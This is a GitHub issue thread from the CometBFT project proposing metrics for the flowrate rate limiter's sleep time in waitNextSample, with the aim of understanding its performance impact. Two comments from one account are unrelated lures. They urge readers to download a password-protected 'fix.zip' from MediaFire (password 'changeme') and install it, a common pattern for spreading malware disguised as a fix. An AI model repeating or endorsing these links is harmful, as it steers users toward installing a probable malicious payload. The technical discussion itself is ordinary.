### ISSUE TITLE
flowrate: export metrics regarding the rate limiter sleep time

### ISSUE THREAD

**Issue by cason** [cometbft/cometbft#3865]
As for #3864 we realized that send and receive rate limiters have impact on the overall performance of connections between nodes, and therefore of the nodes themselves (consensus duration, in particular).

We need some more data to understand the behavior of the flow rate limiter implementation. It is actually based on this package https://pkg.go.dev/github.com/mxk/go-flowrate/flowrate?utm_source=godoc that has not been recently updated, the last release is from 2014.

The package itself produce some data using the `Monitor.Status()` method. This method is invoked by the Multiples connection to provide its own `Status()`, which is consumed by `p2p.Peer` instances to produce some metrics. But at the moment, none of the data produced by the rate limiter is considered or reported as a metric.

In addition, the `Status` produced by the rate limiter does not include the data we find most relevant in our investigations, that is the time that each limiter spend on `time.Sleep` calls, as part of the [waitNextSample](https://github.com/cometbft/cometbft/blob/e67223f8f6eb5d687723d7cd62879d14d58ca5fb/internal/flowrate/flowrate.go#L261) method.

We should collect the total time spent on those `time.Sleep` calls and possibly the maximum amount of time spent on a request to the limiter during a given time interval. This information could be used to produce metrics in the `p2p` package and understand the impact of those idle periods/sleeps in the overall performance of the system.

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
